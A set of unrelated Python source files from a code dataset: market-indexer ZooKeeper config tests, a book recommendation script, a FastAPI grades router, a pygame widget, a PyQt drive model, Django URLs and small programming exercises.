\"prod_report_api_iva@iva\": {\n \"async_publishing_mode\": \"enabled\",\n \"generations_prefix\": \"api_generations\",\n \"min_alive\": {\n \"sas\": 0,\n \"iva\": 1\n },\n \"hosts\": {\n \"host3\": {\n \"key\": \"key:host3.net\",\n \"name\": \"host3.net\",\n \"cluster\": 0,\n \"dists\": {\n \"search-stats\": {},\n \"search-part-3\": {}\n },\n \"service\": \"marketsearch3\",\n \"port\": 17052,\n \"datacenter\": \"iva\"\n },\n \"snippet.host3\": {\n \"key\": \"key:host3.net\",\n \"name\": \"host3.net\",\n \"cluster\": 0,\n \"dists\": {\n \"search-snippet-part-3\": {}\n },\n \"service\": \"marketsearchsnippet\",\n \"port\": 17052,\n \"datacenter\": \"iva\"\n },\n \"host4\": {\n \"key\": \"key:host4.net\",\n \"name\": \"host4.net\",\n \"cluster\": 1,\n \"service\": \"something_strange\",\n \"datacenter\": \"sas\"\n }\n }\n },\n \"prod_report_main_sas@sas\": {\n \"async_publishing_mode\": \"enabled\",\n \"generations_prefix\": \"api_generations\",\n \"min_alive\": {\n \"sas\": 2,\n \"iva\": 0\n },\n \"hosts\": {\n \"host5\": {\n \"key\": \"key:host5.net\",\n \"name\": \"host5.net\",\n \"cluster\": 0,\n \"dists\": {\n \"search-stats\": {},\n \"search-part-5\": {}\n },\n \"service\": \"marketsearch3\",\n \"port\": 17052,\n \"datacenter\": \"sas\"\n },\n \"host6\": {\n \"key\": \"key:host6.net\",\n \"name\": \"host6.net\",\n \"cluster\": 1,\n \"service\": \"marketsearch3\",\n \"port\": 17052,\n \"datacenter\": \"sas\"\n }\n }\n },\n \"market_report_meta@atlantis\": {\n \"async_publishing_mode\": \"enabled\",\n \"min_alive\": {\n \"man\": 2,\n \"sas\": 2,\n \"vla\": 2\n },\n \"hosts\": {}\n },\n \"market_report_exp1@atlantis\": {\n \"async_publishing_mode\": \"enabled\",\n \"min_alive\": {\n \"man\": 2,\n \"sas\": 2,\n \"vla\": 2\n },\n 
\"hosts\": {}\n }\n }\n}''')\n\n\n@pytest.yield_fixture()\ndef miconfig_mock(tmpdir):\n icpath = source_path('market/idx/miconfigs/etc/feature/common.ini')\n dspath = source_path('market/idx/marketindexer/tests/datasources.conf')\n full_config = miconfig.MiConfig(icpath, dspath, prefix_dir=str(tmpdir))\n py.path.local(full_config.log_dir).ensure(dir=True)\n py.path.local(full_config.reductor_config_path).write('{\"dcgroups\": {}}', ensure=True)\n with mock.patch('market.idx.marketindexer.miconfig.force_full_mode', lambda: full_config),\\\n mock.patch('market.idx.pylibrary.mindexer_core.publishers.publisher.miconfig.force_full_mode', lambda: full_config):\n yield full_config\n\n\ndef test_reconfigure_zk(miconfig_mock):\n reconfigure_zk(miconfig_mock, zk_master_cls=mock.MagicMock)\n\n\n@pytest.yield_fixture(scope='module')\ndef read_state_file_fixture():\n HostState = collections.namedtuple('HostState', ['dc', 'is_meta', 'is_alive', 'report_status'])\n states = {\n 'host1': HostState('iva', True, True, ''),\n 'host2': HostState('sas', True, True, ''),\n 'host3': HostState('sas', False, True, ''),\n 'host4': HostState('vla', True, False, ''),\n }\n with mock.patch('market.idx.pylibrary.mindexer_core.publishers.async_publisher.read_state_file') as m:\n m.return_value = states\n yield\n\n\n@pytest.yield_fixture(scope='module')\ndef write_publisher_config_to_zk_fixture(read_state_file_fixture):\n with mock.patch('time.time', mock.MagicMock(return_value=1514757600.0)):\n two_phase_reload_meta = {\n 'market_report_meta@atlantis': TwoPhaseReloadMetaSection(\n 'market_report_meta@atlantis',\n enabled=True,\n base_group='market_report_exp1@atlantis',\n dc_allowed_for_reload=['man', 'sas', 'vla'],\n first_phase_cluster_num=2,\n ),\n }\n\n class two_phase_miconfig():\n def __init__(self):\n self.async_copybases = True\n self.search_state_path = ''\n self.two_phase_reload_group = ['prod_report_main_sas@sas']\n self.first_phase_cluster_num = 1\n self.first_phase_num_candidates = 0\n self.two_phase_reload_meta = two_phase_reload_meta\n\n zk = mock.Mock()\n zk.get.return_value = None, None\n write_publisher_config_to_zk(\n zk,\n REDUCTOR_CONFIG,\n root_prefix='/publisher',\n config=two_phase_miconfig(),\n two_phase_reload_meta_groups=two_phase_reload_meta,\n client='test',\n )\n yield zk\n\n\nclass Json(object):\n def __init__(self, json_dict):\n self._dict = json_dict\n\n def __eq__(self, other):\n return json.loads(other) == self._dict\n\n def __repr__(self):\n return json.dumps(self._dict)\n\n\ndef _meta_and_base_config():\n return Json({\n 'simultaneous_restart': 1,\n 'failures_threshold': 1,\n 'hosts': {},\n 'min_alive': {\n 'sas': 2,\n 'man': 2,\n 'vla': 2,\n },\n 'reload_timeout': 600,\n 'async_publishing': 'enabled',\n 'full_generation': None,\n 'packages': None,\n 'two_phase_reload': 'disabled',\n 'first_phase_nclusters': 0,\n 'close_report_with_old_docs': None,\n 'first_phase_num_candidates': 0,\n 'disable_cpu_usage_limit': False,\n 'two_phase_reload_meta': TwoPhaseReloadMetaConfig(\n enabled=True,\n first_phase_dc='sas',\n first_phase_cluster_num=2,\n ).as_dict(),\n 'timestamp': 1514757600,\n 'client': 'test',\n })\n\n\n@pytest.mark.parametrize('path,data', [\n # hosts\n ('/publisher/hosts/key:host1.net', Json({\n 'group': 'prod_report_int_vla@vla',\n 'cluster': 0,\n 'fqdn': 'host1.net',\n 'dists': {\n 'marketsearch3': ['search-part-1', 'search-stats'],\n },\n 'generations_prefix': '/publisher/generations',\n 'timestamp': 1514757600,\n })),\n ('/publisher/hosts/key:host2.net', Json({\n 'group': 
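The Json helper above lets mock's assert_any_call compare ZooKeeper payloads structurally: equality parses the serialized string, so key order in the written JSON is irrelevant. Restated minimally (the string comparison works because str's __eq__ returns NotImplemented for a Json operand, so Python falls back to Json.__eq__):

import json

class Json(object):
    def __init__(self, json_dict):
        self._dict = json_dict

    def __eq__(self, other):
        return json.loads(other) == self._dict

expected = Json({'a': 1, 'b': [2, 3]})
assert '{"b": [2, 3], "a": 1}' == expected  # order-insensitive match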
'prod_report_int_vla@vla',\n 'cluster': 0,\n 'fqdn': 'host2.net',\n 'dists': {\n 'marketsearch3': ['search-part-2', 'search-stats'],\n },\n 'generations_prefix': '/publisher/generations',\n 'timestamp': 1514757600,\n })),\n ('/publisher/hosts/key:host3.net', Json({\n 'group': 'prod_report_api_iva@iva',\n 'cluster': 0,\n 'fqdn': 'host3.net',\n 'dists': {\n 'marketsearch3': ['search-part-3', 'search-stats'],\n 'marketsearchsnippet': ['search-snippet-part-3']\n },\n 'generations_prefix': '/publisher/api_generations',\n 'timestamp': 1514757600,\n })),\n ('/publisher/hosts/key:host4.net', Json({\n 'group': 'prod_report_api_iva@iva',\n 'cluster': 1,\n 'fqdn': 'host4.net',\n 'dists': {},\n 'generations_prefix': '/publisher/api_generations',\n 'timestamp': 1514757600,\n })),\n # group configs\n ('/publisher/prod_report_int_vla@vla/config', Json({\n 'simultaneous_restart': 3,\n 'failures_threshold': 4,\n 'hosts': {\n '0': [\n {\n 'key': 'key:host1.net',\n 'fqdn': 'host1.net',\n 'port': 9002,\n 'datacenter': None\n }, {\n 'key': 'key:host2.net',\n 'fqdn': 'host2.net',\n 'port': 17051,\n 'datacenter': None\n }\n ]\n },\n 'min_alive': {},\n 'reload_timeout': 600,\n 'async_publishing': 'disabled',\n 'full_generation': None,\n 'packages': None,\n 'two_phase_reload': 'disabled',\n 'first_phase_nclusters': 0,\n 'close_report_with_old_docs': None,\n 'first_phase_num_candidates': 0,\n 'disable_cpu_usage_limit': False,\n 'two_phase_reload_meta': None,\n 'timestamp': 1514757600,\n 'client': 'test',\n })),\n ('/publisher/prod_report_api_iva@iva/config', Json({\n 'simultaneous_restart': 1,\n 'failures_threshold': 1,\n 'hosts': {\n '0': [\n {\n 'key': 'key:host3.net',\n 'fqdn': 'host3.net',\n 'port': 17052,\n 'datacenter': 'iva',\n }\n ],\n '1': [\n {\n 'key': 'key:host4.net',\n 'fqdn': 'host4.net',\n 'port': 9002,\n 'datacenter': 'sas'\n }\n ]\n },\n 'min_alive': {\n 'sas': 0,\n 'iva': 1,\n },\n 'reload_timeout': 600,\n 'async_publishing': 'enabled',\n 'full_generation': None,\n 'packages': None,\n 'two_phase_reload': 'disabled',\n 'first_phase_nclusters': 0,\n 'close_report_with_old_docs': None,\n 'first_phase_num_candidates': 0,\n 'disable_cpu_usage_limit': False,\n 'two_phase_reload_meta': None,\n 'timestamp': 1514757600,\n 'client': 'test',\n })),\n ('/publisher/prod_report_main_sas@sas/config', Json({\n 'simultaneous_restart': 1,\n 'failures_threshold': 1,\n 'hosts': {\n '0': [\n {\n 'key': 'key:host5.net',\n 'fqdn': 'host5.net',\n 'port': 17052,\n 'datacenter': 'sas',\n }\n ],\n '1': [\n {\n 'key': 'key:host6.net',\n 'fqdn': 'host6.net',\n 'port': 17052,\n 'datacenter': 'sas'\n }\n ]\n },\n 'min_alive': {\n 'sas': 2,\n 'iva': 0,\n },\n 'reload_timeout': 600,\n 'async_publishing': 'enabled',\n 'full_generation': None,\n 'packages': None,\n 'two_phase_reload': 'enabled',\n 'first_phase_nclusters': 1,\n 'close_report_with_old_docs': None,\n 'first_phase_num_candidates': 0,\n 'disable_cpu_usage_limit': False,\n 'two_phase_reload_meta': None,\n 'timestamp': 1514757600,\n 'client': 'test',\n })),\n ('/publisher/market_report_meta@atlantis/config', _meta_and_base_config()),\n ('/publisher/market_report_exp1@atlantis/config', _meta_and_base_config()),\n])\ndef test_write_publisher_config_to_zk_set_calls(write_publisher_config_to_zk_fixture, path, data):\n write_publisher_config_to_zk_fixture.set.assert_any_call(path, 
data)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/tests/test_reconfigure.py","file_name":"test_reconfigure.py","file_ext":"py","file_size_in_byte":13146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"23464269441","text":"from models.models_zoo import unet_resnext_50, unet_resnext_50_lovasz\nfrom segmentation_models.backbones.preprocessing import get_preprocessing\n\n\ndef get_model(network, input_shape, freeze_encoder):\n    if network == 'unet_resnext_50':\n        model = unet_resnext_50(input_shape, freeze_encoder)\n        return model, get_preprocessing('resnext50')\n    elif network == 'unet_resnext_50_lovasz':\n        model = unet_resnext_50_lovasz(input_shape, freeze_encoder)\n        return model, get_preprocessing('resnext50')\n    else:\n        raise ValueError('Unknown network ' + network)\n","repo_name":"ybabakhin/kaggle_salt_bes_phalanx","sub_path":"bes/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"72"}
{"seq_id":"5070845677","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Aakriti Gupta\r\n\"\"\"\r\nprint ()\r\n\r\nimport networkx\r\nfrom operator import itemgetter\r\nimport matplotlib.pyplot\r\n\r\n# Read the data from the amazon-books.txt;\r\n# populate amazonBooks nested dictionary;\r\n# key = ASIN; value = MetaData associated with ASIN\r\nfhr = open('/Users/aaku/Desktop/CIS509/HwAssignment5/amazon-books.txt', 'r', encoding='utf-8', errors='ignore')\r\namazonBooks = {}\r\nfhr.readline()\r\nfor line in fhr:\r\n    cell = line.split('\\t')\r\n    MetaData = {}\r\n    MetaData['Id'] = cell[0].strip() \r\n    ASIN = cell[1].strip()\r\n    MetaData['Title'] = cell[2].strip()\r\n    MetaData['Categories'] = cell[3].strip()\r\n    MetaData['Group'] = cell[4].strip()\r\n    MetaData['SalesRank'] = int(cell[5].strip())\r\n    MetaData['TotalReviews'] = int(cell[6].strip())\r\n    MetaData['AvgRating'] = float(cell[7].strip())\r\n    MetaData['DegreeCentrality'] = int(cell[8].strip())\r\n    MetaData['ClusteringCoeff'] = float(cell[9].strip())\r\n    amazonBooks[ASIN] = MetaData\r\nfhr.close()\r\n\r\n# Read the data from amazon-books-copurchase.adjlist;\r\n# assign it to copurchaseGraph weighted Graph;\r\n# node = ASIN, edge= copurchase, edge weight = category similarity\r\nfhr=open(\"amazon-books-copurchase.edgelist\", 'rb')\r\ncopurchaseGraph=networkx.read_weighted_edgelist(fhr)\r\nfhr.close()\r\n\r\n# Now let's assume a person is considering buying the following book;\r\n# what else can we recommend to them based on copurchase behavior \r\n# we've seen from other users?\r\nprint (\"Looking for Recommendations for Customer Purchasing this Book:\")\r\nprint (\"--------------------------------------------------------------\")\r\npurchasedAsin = '0805047905'\r\n\r\n# Let's first get some metadata associated with this book\r\nprint (\"ASIN = \", purchasedAsin) \r\nprint (\"Title = \", amazonBooks[purchasedAsin]['Title'])\r\nprint (\"SalesRank = \", amazonBooks[purchasedAsin]['SalesRank'])\r\nprint (\"TotalReviews = \", amazonBooks[purchasedAsin]['TotalReviews'])\r\nprint (\"AvgRating = \", amazonBooks[purchasedAsin]['AvgRating'])\r\nprint (\"DegreeCentrality = \", amazonBooks[purchasedAsin]['DegreeCentrality'])\r\nprint (\"ClusteringCoeff = \", amazonBooks[purchasedAsin]['ClusteringCoeff'])\r\n \r\n# Now let's look at the ego network associated with purchasedAsin in the\r\n# copurchaseGraph - which is essentially comprised of all the books \r\n# that have been copurchased with this book in the past\r\npurchasedAsinEgoGraph = networkx.ego_graph(copurchaseGraph, purchasedAsin, radius=1)\r\n\r\n# -------------------------------------------------------------------------------\r\n# Print the Ego Network \r\n#pos=networkx.spring_layout(purchasedAsinEgoGraph)\r\n#matplotlib.pyplot.figure(figsize=(15,15))\r\n#networkx.draw_networkx_nodes(purchasedAsinEgoGraph,pos,node_size=1500)\r\n#networkx.draw_networkx_labels(purchasedAsinEgoGraph,pos,font_size=10)\r\n#edgewidth = [ d['weight'] for (u,v,d) in purchasedAsinEgoGraph.edges(data=True)]\r\n#networkx.draw_networkx_edges(purchasedAsinEgoGraph,pos,width=edgewidth)\r\n#edgelabel = networkx.get_edge_attributes(purchasedAsinEgoGraph,'weight')\r\n#networkx.draw_networkx_edge_labels(purchasedAsinEgoGraph,pos,edge_labels=edgelabel,font_size=10)\r\n#matplotlib.pyplot.axis('off')\r\n#matplotlib.pyplot.show()\r\n# -------------------------------------------------------------------------------\r\n\r\n# Next, recall that the edge weights in the copurchaseGraph are a measure of\r\n# the similarity between the books connected by the edge. So we can use the \r\n# island method to only retain those books that are highly similar to the \r\n# purchasedAsin\r\nthreshold = 0.5\r\npurchasedAsinEgoTrimGraph = networkx.Graph()\r\nfor f, t, e in purchasedAsinEgoGraph.edges(data=True):\r\n    if e['weight'] >= threshold:\r\n        purchasedAsinEgoTrimGraph.add_edge(f, t, **e)\r\n    \r\n# -------------------------------------------------------------------------------\r\n# PRINT THE ISLAND GRAPH \r\n\r\n#pos=networkx.spring_layout(purchasedAsinEgoTrimGraph)\r\n#matplotlib.pyplot.figure(figsize=(15,15))\r\n#networkx.draw_networkx_nodes(purchasedAsinEgoTrimGraph,pos,node_size=1500)\r\n#networkx.draw_networkx_labels(purchasedAsinEgoTrimGraph,pos,font_size=10)\r\n#edgewidth = [ d['weight'] for (u,v,d) in purchasedAsinEgoTrimGraph.edges(data=True)]\r\n#networkx.draw_networkx_edges(purchasedAsinEgoTrimGraph,pos,width=edgewidth)\r\n#edgelabel = networkx.get_edge_attributes(purchasedAsinEgoTrimGraph,'weight')\r\n#networkx.draw_networkx_edge_labels(purchasedAsinEgoTrimGraph,pos,edge_labels=edgelabel,font_size=10)\r\n#matplotlib.pyplot.axis('off') \r\n#matplotlib.pyplot.show() \r\n# -------------------------------------------------------------------------------\r\n\r\n# Next, recall that given the purchasedAsinEgoTrimGraph you constructed above, \r\n# you can get at the list of nodes connected to the purchasedAsin by a single \r\n# hop (called the neighbors of the purchasedAsin) \r\npurchasedAsinNeighbors = purchasedAsinEgoTrimGraph.neighbors(purchasedAsin)\r\n# print(len(purchasedAsinNeighbors))\r\n# print(purchasedAsinNeighbors)\r\n\r\n# Next, let's pick the Top Five book recommendations from among the \r\n# purchasedAsinNeighbors based on one or more of the following data of the \r\n# neighboring nodes: SalesRank, AvgRating, TotalReviews, DegreeCentrality, \r\n# and ClusteringCoeff\r\nprint()\r\nweights = {}\r\nfor a in purchasedAsinNeighbors:\r\n    # print('ASIN:',a)\r\n    # print('Clustering Coefficient:', amazonBooks[a]['ClusteringCoeff'])\r\n    # print('Degree Centrality:', amazonBooks[a]['DegreeCentrality'])\r\n    # print('Average Rating:', amazonBooks[a]['AvgRating'])\r\n    dc = amazonBooks[a]['DegreeCentrality']\r\n    cc = amazonBooks[a]['ClusteringCoeff']\r\n    sales = amazonBooks[a]['SalesRank']\r\n    val = (cc*dc)/sales\r\n    val = round(val, 5)\r\n    # print('Value:', val)\r\n    weights[a] = 
val\r\n # print()\r\n# print(weights)\r\nprint()\r\nsorted_weights = sorted(weights.items(), key=itemgetter(1), reverse=True)\r\n# print(sorted_weights)\r\ntop5 = {}\r\ni = 0\r\nwhile i < 5:\r\n top5[sorted_weights[i][0]] = sorted_weights[i][1]\r\n i = i + 1\r\nprint()\r\n# print(top5)\r\n# print()\r\n \r\n# Print Top 5 recommendations (ASIN, and associated Title, Sales Rank, \r\n# TotalReviews, AvgRating, DegreeCentrality, ClusteringCoeff)\r\nj = 1\r\nprint (\"Top 5 Recommendations for Customer\")\r\nprint (\"-------------------------------------\")\r\nfor rec in top5.keys():\r\n # print(rec)\r\n print(\"Recommendation #\", j)\r\n print (\"ASIN = \", rec) \r\n print (\"Title = \", amazonBooks[rec]['Title'])\r\n print (\"SalesRank = \", amazonBooks[rec]['SalesRank'])\r\n print (\"TotalReviews = \", amazonBooks[rec]['TotalReviews'])\r\n print (\"AvgRating = \", amazonBooks[rec]['AvgRating'])\r\n print (\"DegreeCentrality = \", amazonBooks[rec]['DegreeCentrality'])\r\n print (\"ClusteringCoeff = \", amazonBooks[rec]['ClusteringCoeff'])\r\n j = j + 1\r\n print()\r\n","repo_name":"aagupta/SocialNetworkAnalysis","sub_path":"A71Assignment5.py","file_name":"A71Assignment5.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"830144068","text":"# colors to prettify output, don't edit\nclr = ['\\033[38;5;208m', # Phone\n '\\033[38;5;112m', # Computer\n '\\033[38;5;87m', # Smartphone\n '\\033[38;5;160m', # IPhone\n '\\033[0m']\n\nclass Phone(object): # you may edit within the parentheses\n def __init__(self, number):\n print(f'{clr[0]}[Phone init ({self.__class__.__name__})]{clr[4]}')\n # don't edit above\n # write your code here (only inside the `__init__` method)\n # super(Phone, self).__init__()\n self.number = number\n\n def make_call(self, number):\n print(f'{clr[0]}[Phone make call ({self.__class__.__name__})]{clr[4]}')\n # don't edit above\n # write your code here (only inside the `make_call` method)\n print(f'Call from {self.number} to {number}.')\n\nclass Computer(object): # you may edit within the parentheses\n def __init__(self, operating_system, cpu, ram_size, input_devices):\n print(f'{clr[1]}[Computer init ({self.__class__.__name__})]{clr[4]}')\n # don't edit above\n # write your code here (only inside the `__init__` method)\n # super(Computer, self).__init__()\n self.operating_system = operating_system\n self.cpu = cpu\n self.ram_size = ram_size\n self.input_devices = input_devices\n\nclass Smartphone(Computer, Phone): # you may edit within the parentheses\n def __init__(self, operating_system, cpu, ram_size, number, battery):\n print(f'{clr[2]}[Smartphone init ({self.__class__.__name__})]{clr[4]}')\n # don't edit above\n # write your code here (only inside the `__init__` method)\n Computer.__init__(self, operating_system, cpu, ram_size, ['touch screen'])\n Phone.__init__(self, number)\n self.battery = battery\n\nclass IPhone(Smartphone): # you may edit within the parentheses\n def __init__(self, cpu, ram_size, number, battery):\n print(f'{clr[3]}[IPhone init ({self.__class__.__name__})]{clr[4]}')\n # don't edit above\n # write your code here (only inside the `__init__` method)\n super(IPhone, self).__init__(\"iOS\", cpu, ram_size, number, 
battery)\n","repo_name":"obuhaiov-ucode/Python_sprints","sub_path":"sprint5/t04_inheritance/gadgets.py","file_name":"gadgets.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23628894564","text":"import pygame\nfrom .gui_abstract_object import GuiAbstractObject\n\n\nclass Location(GuiAbstractObject):\n\n def __init__(self, x, y, player, screen):\n self.player = player\n self.position = (x, y, 400, 30)\n self.screen = screen\n self.rects_pos = {\n 'main': None,\n }\n self.strings = {\n 'location': (),\n }\n self.buttons = []\n\n def create(self):\n position = (self.position[0] * self.screen.engine.settings.graphic['screen']['resolution_scale'][0],\n self.position[1] - 100 * self.screen.engine.settings.graphic['screen']['resolution_scale'][1],\n self.position[2] * self.screen.engine.settings.graphic['screen']['resolution_scale'][0],\n self.position[3] * self.screen.engine.settings.graphic['screen']['resolution_scale'][1])\n self.rects_pos['main'] = (position, (255, 255, 255))\n\n text = self.screen.engine.map.name + ' | x: ' + str(self.player.coordinate[0]) + ' | y: '\\\n + str(self.player.coordinate[1])\n self.strings['location'] = (text, position)\n\n\n def render(self):\n pygame.draw.rect(self.screen.screen, self.rects_pos['main'][1], self.rects_pos['main'][0])\n text = self.screen.engine.map.name + ' | x: ' + str(self.player.coordinate[0]) + ' | y: '\\\n + str(self.player.coordinate[1])\n self.strings['location'] = (text, self.strings['location'][1])\n self.render_text(self.strings['location'][1][0], self.strings['location'][1][2], self.strings['location'][1][1],\n self.strings['location'][1][3], self.strings['location'][0])\n\n def render_text(self, x1, x2, y1, y2, string):\n text_size = self.screen.font.size(string)\n\n x = x2 - text_size[0]\n y = y2 - text_size[1]\n\n x /= 2\n y /= 2\n\n x += x1\n y += y1\n\n string = self.screen.font.render(string, self.screen.engine.settings.graphic['screen']['antialias'], (0, 0, 0))\n self.screen.screen.blit(string, (x, y))\n","repo_name":"Sheidaas/gamee","sub_path":"data/modules/graphic/two_D/player_gui/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18075074932","text":"from fastapi import APIRouter, HTTPException, Depends\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy import select\n\nfrom app.models.models import Grade as GradeModel\nfrom app.schemas.schemas import GradeCreate, GradeUpdate, Grade\n\nfrom app.database.database import get_async_db\n\nrouter = APIRouter()\n\n\n@router.post(\"/grades\", response_model=Grade)\nasync def create_grade(grade: GradeCreate, db: AsyncSession = Depends(get_async_db)):\n \"\"\"Create a new grade.\"\"\"\n\n db_grade = GradeModel(**grade.dict())\n db.add(db_grade)\n await db.commit()\n await db.refresh(db_grade)\n\n return Grade.from_orm(db_grade)\n\n\n@router.put(\"/grades/{grade_id}\", response_model=Grade)\nasync def update_grade(grade_id: int, grade_update: GradeUpdate, db: AsyncSession = Depends(get_async_db)):\n \"\"\"Update existing grade by ID\"\"\"\n\n # get the grade\n grade = await db.execute(select(GradeModel).where(GradeModel.grade_id == grade_id))\n db_grade = grade.scalar()\n if db_grade is None:\n raise HTTPException(status_code=404, detail=\"Grade not found\")\n\n if grade_update.grade is not None:\n db_grade.grade = 
grade_update.grade\n\n    await db.commit()\n    await db.refresh(db_grade)\n\n    return Grade.from_orm(db_grade)\n","repo_name":"Shved15/Polymedic-test-task","sub_path":"app/routes/grade.py","file_name":"grade.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"29673706545","text":"import sys\r\nclass DNode: # implemented as a doubly linked list; unlike a singly linked list we can move to the previous node, so access is easier but more memory is used \r\n    def __init__(self,e):\r\n        self.data=e\r\n        self.back=None\r\n        self.next=None\r\n\r\nclass web: \r\n    def __init__(self):\r\n        first=DNode('www.hufs.ac.kr') # set the initial site\r\n        self.historylist=['www.hufs.ac.kr'] # history of sites visited via go\r\n        self.historyout=[] # list used to print the site history\r\n        self.head=first\r\n        self.tail=first\r\n        self.now=first\r\n        print(first.data) # print the initial site\r\n        \r\n        \r\n        \r\n    def go(self,addr):\r\n        new=DNode(addr)\r\n        if self.now== self.tail: # moving to a new site from the last visited position \r\n            self.tail.next=new\r\n            new.back=self.tail\r\n            self.tail=new # set tail (the last node) to the newly visited address\r\n            self.now=new # set the current site to the newly visited address\r\n            self.historylist.append(self.now.data)\r\n            print(self.now.data)\r\n        else: # moving to a new site after having gone back\r\n            new.back=self.now\r\n            self.now.next=new\r\n            self.now=new # set the current site to the newly visited address\r\n            self.tail=new # set tail (the last node) to the newly visited address\r\n            self.historylist.append(self.now.data)\r\n            print(self.now.data)\r\n        \r\n        \r\n    def forward(self): # go forward\r\n        if self.now==self.tail: # cannot go forward any further\r\n            return\r\n        else:\r\n            self.now=self.now.next\r\n            print(self.now.data)\r\n        \r\n    def backward(self): # go back\r\n        if self.now==self.head: # cannot go back any further\r\n            return\r\n        else:\r\n            self.now=self.now.back\r\n            print(self.now.data)\r\n        \r\n    def history(self): # print the sites visited via go in reverse order\r\n        self.historyout=[] # empty the output list so history can be run multiple times\r\n        index=len(self.historylist)-1 # reverse order, so check for duplicates from the end\r\n        while index >= 0:\r\n            if self.historylist[index] not in self.historyout:\r\n                self.historyout.append(self.historylist[index])\r\n            index-=1\r\n        \r\n        for i in range(len(self.historyout)): # print the history\r\n            print(self.historyout[i])\r\n        \r\n    def quit(self):\r\n        sys.exit() \r\n\r\nexplore=web() \r\nwhile True:\r\n    come=sys.stdin.readline().strip()\r\n    if come[0:2]=='go':\r\n        fun,address=come.split()\r\n    else:\r\n        fun=come\r\n    \r\n    if fun=='go':\r\n        explore.go(address)\r\n    elif fun=='forward':\r\n        explore.forward()\r\n    elif fun=='backward':\r\n        explore.backward()\r\n    elif fun=='history':\r\n        explore.history()\r\n    elif fun=='quit':\r\n        explore.quit()\r\n    \r\n","repo_name":"yeolgong/pystudy","sub_path":"5회차/201902520 5.2.py","file_name":"201902520 5.2.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"23455642431","text":"import dbus\n\nfrom PyQt4 import QtCore\n\n\nbus = dbus.SystemBus()\nproxy = bus.get_object('org.freedesktop.UDisks', '/org/freedesktop/UDisks')\ninterface = dbus.Interface(proxy, 'org.freedesktop.UDisks')\n\n\nclass Partition(QtCore.QObject):\n\n    def __init__(self, properties, parent=None):\n        QtCore.QObject.__init__(self, parent)\n        self._properties = properties\n\n    def __str__(self):\n        return str(self._properties['DeviceFile'])\n\n    def _getName(self):\n        return str(self._properties['DeviceFile'])\n\n    changed = QtCore.pyqtSignal()\n\n    name = QtCore.pyqtProperty(unicode, _getName, notify=changed)\n\n\nclass Drive(QtCore.QObject):\n\n    def __init__(self, properties, parent=None):\n        QtCore.QObject.__init__(self, parent)\n        self._properties = properties\n        self._partition = []\n\n    def __str__(self):\n        return 
str(self._properties['DeviceFile'])\n\n def addPartition(self, partition):\n self._partition.append(partition)\n\n def _getName(self):\n return str(self._properties['DeviceFile'])\n\n changed = QtCore.pyqtSignal()\n\n name = QtCore.pyqtProperty(unicode, _getName, notify=changed)\n\n\nclass DriveModel(QtCore.QAbstractListModel):\n\n COLUMNS = ('drive',)\n\n def __init__(self, parent=None):\n QtCore.QAbstractListModel.__init__(self, parent)\n self._drivers = []\n self.setRoleNames(dict(enumerate(DriveModel.COLUMNS)))\n\n def rowCount(self, parent=QtCore.QModelIndex()):\n return len(self._drivers)\n\n def data(self, index, role):\n if index.isValid() and role == DriveModel.COLUMNS.index('drive'):\n return self._drivers[index.row()]\n return None\n\n def populate(self):\n drivers = {}\n partitions = {}\n\n for device in interface.EnumerateDevices():\n deviceProxy = bus.get_object('org.freedesktop.UDisks', device)\n deviceInterface = dbus.Interface(deviceProxy, 'org.freedesktop.DBus.Properties')\n deviceProperties = deviceInterface.GetAll('org.freedesktop.UDisks.Device')\n\n if deviceProperties['DeviceIsDrive'] == 1:\n drivers[str(device)] = Drive(deviceProperties)\n continue\n\n if deviceProperties['DeviceIsPartition'] == 1:\n try:\n # Check if partition key alrealy exist\n partitions[str(deviceProperties['PartitionSlave'])]\n except KeyError:\n # if not create a empty list to the given key partition\n partitions[str(deviceProperties['PartitionSlave'])] = []\n partitions[str(deviceProperties['PartitionSlave'])].append(Partition(deviceProperties))\n continue\n\n for (driver_name, driver_klass) in drivers.items():\n try:\n for partition in partitions[driver_name]:\n driver_klass.addPartition(partition)\n except KeyError:\n # A keyError is raised if the given drive don't have partitions\n pass\n self._drivers.append(driver_klass)\n","repo_name":"wiliamsouza/Disks","sub_path":"disks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26815065160","text":"from django.conf.urls import url\nfrom django.urls import path\n\nfrom . 
import views\n\napp_name = 'polls'\n\nurlpatterns = [\n    url(r'^$', views.IndexView.as_view(), name='index'),\n    url(r'^(?P<pk>[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n    path('moods', views.MoodsView.as_view(), name='moods'),\n    url(r'^(?P<pk>[0-9]+)/results/$', views.ResultsView.as_view(), name='results'),\n    url(r'^(?P<question_id>[0-9]+)/vote/$', views.vote, name='vote'),\n]\n","repo_name":"apiispanen/biohacker","sub_path":"mysite/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
